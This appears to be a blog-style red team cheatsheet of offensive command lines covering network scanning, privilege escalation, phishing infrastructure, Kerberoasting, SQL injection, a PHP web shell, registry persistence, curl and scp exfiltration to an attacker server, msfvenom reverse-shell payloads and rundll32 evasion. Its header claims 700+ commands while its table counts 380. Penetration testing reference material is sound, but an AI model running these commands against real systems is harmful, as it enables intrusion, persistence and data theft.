Red Team Cheatsheet - Comprehensive Command Reference
Source: Satyam Rastogi Red Team Arsenal
Created by: Satyam Rastogi - Cybersecurity Leader
Created by: Satyam Rastogi - Cybersecurity Leader
The Red Team Arsenal is the ultimate comprehensive penetration testing command reference with over 700+ commands across 12 major categories. Each command includes:
- MITRE ATT&CK Mappings - Framework alignment for technique classification
- OPSEC Considerations - Operational security implications
- Evasion Techniques - Detection avoidance methods
- Risk Levels - Low, Medium, High, and Critical classifications
- Platform Support - Linux, Windows, and macOS compatibility
Table of Contents
Overview & Arsenal Statistics
Key Metrics
| Metric | Value |
|---|---|
| Total Commands | 380 |
| Commands with Examples | 67% (254 Examples) |
| MITRE ATT&CK Mapped | 40% (153 Commands) |
| OPSEC Notes Included | 25% (96 Commands) |
| Evasion Techniques | 93 Techniques |
Risk Level Distribution
| Risk Level | Count |
|---|---|
| Low | 64 |
| Medium | 46 |
| High | 35 |
| Critical | 8 |
Platform Support
| Platform | Commands |
|---|---|
| Linux | 112 |
| Windows | 105 |
| macOS | 82 |
Infrastructure Attacks
Network and system attacks for initial access and enumeration. This category covers reconnaissance, exploitation, privilege escalation, and lateral movement techniques.
Enumeration
Discover and gather information about targets using network reconnaissance tools.
Network Scanning and Discovery
Full Port Scan with Service Detection
nmap -sV -sC -p- {target}
Comprehensive port scan that identifies all open ports and attempts to determine service versions and operating system details using default NSE scripts.
Network Sweep/Ping Scan
nmap -sn {network_range}
Identifies live hosts on a network without performing port scanning, useful for network mapping and host discovery.
Vulnerability Scanning
nmap --script vuln {target}
Scans for common vulnerabilities using Nmap vulnerability scripts, providing quick assessment of known issues.
ARP-based Host Discovery
netdiscover -r {network_range}
Discovers active hosts on the network using ARP requests, effective for local network enumeration.
SMB Enumeration
Comprehensive SMB Enumeration
enum4linux -a {target}
Enumerates SMB shares, users, groups, and other information on Windows/Samba systems with detailed output.
Anonymous SMB Share Listing
smbclient -L //{target}/ -N
Lists available SMB shares on a target system without requiring authentication.
Advanced Scanning Tools
High-Speed Port Scanning
masscan -p1-65535 {target_range} --rate=1000
Extremely fast port scanner capable of scanning large networks at high rates, useful for large-scale assessments.
Fast Port Scanner with Nmap Integration
rustscan -a {target} -- -sV -sC
Modern Rust-based port scanner with Nmap integration for efficient service detection and enumeration.
Vulnerability Assessment
Template-based Vulnerability Scanning
nuclei -t {template_path} -u {target}
Vulnerability scanner using MITRE ATT&CK templates for comprehensive and organized testing.
LDAP Enumeration
LDAP Directory Enumeration
ldapsearch -x -H ldap://{target} -b "dc={domain},dc={tld}"
Queries LDAP directory for user information, groups, and other Active Directory details.
Exploitation
Metasploit Framework
msfconsole -r {resource_file}
Launches Metasploit Framework console with automated exploitation scripts for rapid vulnerability exploitation.
Exploit Database Search
searchsploit {vulnerability}
Searches the Exploit Database for known public exploits matching the specified vulnerability.
Privilege Escalation (Linux)
Sudo Privileges Enumeration
sudo -l
Lists available sudo commands for the current user, identifying privilege escalation opportunities.
SUID Binary Discovery
find / -perm -4000 2>/dev/null
Identifies SUID binaries that may be exploited for privilege escalation.
Linux Capabilities Enumeration
getcap -r / 2>/dev/null
Identifies binaries with Linux capabilities that can be exploited for privilege escalation.
Process Enumeration
ps aux
Lists all running processes to identify privilege escalation opportunities and running services.
Privilege Escalation (Windows)
User Privileges Display
whoami /all
Displays current user privileges and group memberships for privilege escalation assessment.
Local User Enumeration
Get-LocalUser | Select-Object Name,Enabled
PowerShell command to enumerate local users and their status.
Administrator Group Members
Get-LocalGroupMember -Group "Administrators"
Lists members of the Administrators group for identifying high-value targets.
Pivoting
SSH SOCKS Proxy
ssh -D 1080 {user}@{pivot_host}
Creates SOCKS proxy through SSH for network pivoting and lateral movement.
Chisel Tunneling
chisel client {attacker_ip}:8080 R:socks
Lightweight tunneling tool for network pivoting with SOCKS proxy support.
Phishing Attacks
Email phishing attack techniques and frameworks for social engineering. This section covers infrastructure setup, email configuration, target reconnaissance, and campaign management.
Infrastructure Setup
GoPhish Repository Cloning
git clone https://github.com/gophish/gophish.git
Clones the GoPhish repository for phishing campaign setup and deployment.
GoPhish Compilation
cd gophish && go build
Builds GoPhish from source code for custom deployment.
GoPhish Server Launch
./gophish
Runs GoPhish server with default admin credentials (admin:gophish) for phishing campaign management.
Docker-based GoPhish Deployment
docker run -d -p 3333:3333 -p 8080:80 -p 8443:443 gophish/gophish
Deploys GoPhish using Docker for containerized phishing infrastructure.
Evilginx2 Phishing Proxy
docker run -d --name evilginx2 -p 80:80 -p 443:443 kgretzky/evilginx2
Deploys Evilginx2 phishing proxy for credential harvesting and session hijacking.
Email Configuration
SMTP Email Sending
swaks -t {target_email} -f {sender_email} -s {smtp_server} --body "{message}"
Sends emails through SMTP for phishing campaigns with customizable content.
Target Reconnaissance
Email and Subdomain Harvesting
theHarvester -d {domain} -l 100 -b google
Harvests email addresses and subdomains from public sources for target identification.
Windows Active Directory
Active Directory attacks and exploitation techniques for domain environments. This includes user enumeration, Kerberos attacks, and lateral movement.
User and Computer Enumeration
Active Directory User Enumeration
Get-ADUser -Filter * | Select-Object Name,SamAccountName
Enumerates all Active Directory users with their account names.
Active Directory Group Enumeration
Get-ADGroup -Filter * | Select-Object Name
Lists all Active Directory groups for privilege escalation assessment.
Domain Computer Enumeration
Get-ADComputer -Filter * | Select-Object Name,OperatingSystem
Enumerates domain computers and their operating systems for targeting.
Kerberos Attacks
Kerberoasting - Service Ticket Extraction
GetUserSPNs.py -request {domain}/{user}:{password} -dc-ip {dc_ip}
Requests Kerberos service tickets for offline password cracking.
Kerberoasting Hash Cracking
hashcat -m 13100 {hashes_file} {wordlist}
Cracks Kerberoasting hashes using Hashcat for password recovery.
Lateral Movement
PsExec Remote Command Execution
psexec.py {domain}/{user}:{password}@{target}
Executes commands on remote systems using PsExec for lateral movement.
Cloud Security
Cloud platform security testing techniques for AWS, Azure, and Google Cloud Platform environments.
AWS Enumeration
S3 Bucket Enumeration
aws s3 ls
Lists accessible S3 buckets for identifying cloud storage vulnerabilities.
EC2 Instance Enumeration
aws ec2 describe-instances
Enumerates EC2 instances in the AWS account for targeting and assessment.
Azure Enumeration
Azure Subscription Enumeration
az account list
Lists Azure subscriptions and accounts for cloud infrastructure mapping.
Azure Virtual Machine Enumeration
az vm list --output table
Enumerates virtual machines in Azure for cloud infrastructure assessment.
GCP Enumeration
Google Cloud Platform Instance Enumeration
gcloud compute instances list
Lists Google Cloud Platform instances for cloud infrastructure assessment.
Web Application Attacks
Web application testing techniques and exploitation methods for identifying and exploiting web vulnerabilities.
SQL Injection
Automated SQL Injection Testing
sqlmap -u "{url}" --dbs --batch
Automated SQL injection detection and database enumeration with batch mode.
Web Server Scanning
Web Server Vulnerability Scanning
nikto -h {target}
Web server vulnerability scanner for identifying misconfigurations and vulnerabilities.
Authentication Bypass
SQL Injection Authentication Bypass
' OR '1'='1
SQL injection payload for bypassing authentication mechanisms.
File Upload Vulnerabilities
Web Shell Deployment
php -r 'system($_GET["cmd"]);'
Web shell for command execution through file upload vulnerabilities.
Post-Exploitation
Post-exploitation techniques for maintaining access and data exfiltration after successful compromise.
Persistence Mechanisms
Windows Registry Persistence
reg add HKLM\Software\Microsoft\Windows\Run /v Malware /t REG_SZ /d "C:\path\to\malware.exe"
Creates Windows registry persistence mechanism for maintaining access.
Linux Cron Job Persistence
crontab -e
Edits cron jobs for Linux persistence and scheduled command execution.
Data Exfiltration
HTTP-based Data Exfiltration
curl -X POST -d @{file} http://{attacker_server}/upload
Exfiltrates data via HTTP POST request to attacker-controlled server.
Secure Copy Data Exfiltration
scp {file} {user}@{attacker_ip}:/path/
Secure copy for encrypted data exfiltration over SSH.
Command & Control Frameworks
Command and Control (C2) frameworks for remote access and control of compromised systems.
Metasploit Framework
Metasploit Console Launch
msfconsole
Launches Metasploit Framework console for exploitation and C2 operations.
Cobalt Strike
Cobalt Strike Team Server
./teamserver {ip} {password}
Launches Cobalt Strike team server for advanced C2 operations.
Empire Framework
Empire C2 Framework
python empire
Launches Empire C2 framework for post-exploitation and lateral movement.
Wireless Security
Wireless network security testing techniques for assessing wireless network security posture.
Network Discovery
Wireless Network Discovery
airodump-ng {interface}
Discovers wireless networks and connected clients for wireless assessment.
Packet Capture
Wireless Traffic Capture
tcpdump -i {interface} -w {output_file}
Captures wireless network traffic for analysis and vulnerability identification.
WPA Cracking
WPA/WPA2 Password Cracking
aircrack-ng -w {wordlist} {capture_file}
Cracks WPA/WPA2 passwords from captured handshakes using wordlist attacks.
Mobile Security
Mobile application and device security testing techniques for iOS and Android platforms.
Android Analysis
Android APK Decompilation
apktool d {apk_file}
Decompiles Android APK for source code analysis and vulnerability assessment.
iOS Analysis
iOS Binary Analysis
otool -L {binary}
Analyzes iOS binary dependencies for security assessment.
OSINT & Reconnaissance
Open Source Intelligence gathering and reconnaissance techniques for information collection and target identification.
Domain Enumeration
WHOIS Domain Information
whois {domain}
Retrieves domain registration information including registrant details.
DNS Enumeration
dig {domain} ANY
Performs DNS enumeration to identify DNS records and subdomains.
Subdomain Discovery
Subdomain Enumeration with Subfinder
subfinder -d {domain}
Discovers subdomains using multiple sources for comprehensive domain mapping.
Advanced Subdomain Enumeration
amass enum -d {domain}
Advanced subdomain enumeration with Amass for thorough reconnaissance.
Email Discovery
Email and Subdomain Harvesting
theHarvester -d {domain} -l 100 -b all
Harvests emails and subdomains from all available public sources.
Evasion Techniques
Anti-detection and evasion techniques for avoiding security controls and detection systems.
Payload Obfuscation
Obfuscated Payload Generation
msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -e x86/shikata_ga_nai -i 5 -f exe -o {output}
Generates obfuscated payload with multiple encoding iterations for AV evasion.
Encryption
File Encryption
openssl enc -aes-256-cbc -in {file} -out {encrypted_file}
Encrypts files using AES-256 to avoid detection by security tools.
Process Injection
Legitimate Process Execution
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write(new ActiveXObject('WScript.Shell').Exec('cmd.exe').StdOut.ReadAll());
Executes code through legitimate Windows processes for evasion.
Forensics & DFIR
Digital forensics and incident response techniques for investigating security incidents and analyzing compromised systems.
Memory Forensics
Memory Dump Analysis
volatility -f {memory_dump} imageinfo
Analyzes memory dumps for forensic investigation and malware analysis.
Log Analysis
Log File Searching
grep -r "error" /var/log/
Searches logs for suspicious activity and error messages during incident response.
File Recovery
Deleted File Recovery
photorec -d {output_dir} {image_file}
Recovers deleted files from disk images for forensic investigation.
How to Use This Cheatsheet
- Select a Category - Choose from the major categories based on your testing phase
- Review Techniques - Understand the specific techniques and their MITRE ATT&CK mappings
- Copy Commands - Use the provided commands as templates for your testing
- Customize Parameters - Replace placeholders like
{target},{domain}, etc. with actual values - Check OPSEC - Review operational security considerations before executing
- Verify Authorization - Always ensure you have proper authorization before testing
WARNING: All techniques and commands in this cheatsheet should only be used on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. Always ensure proper authorization and follow applicable laws and regulations.
Comments
Post a Comment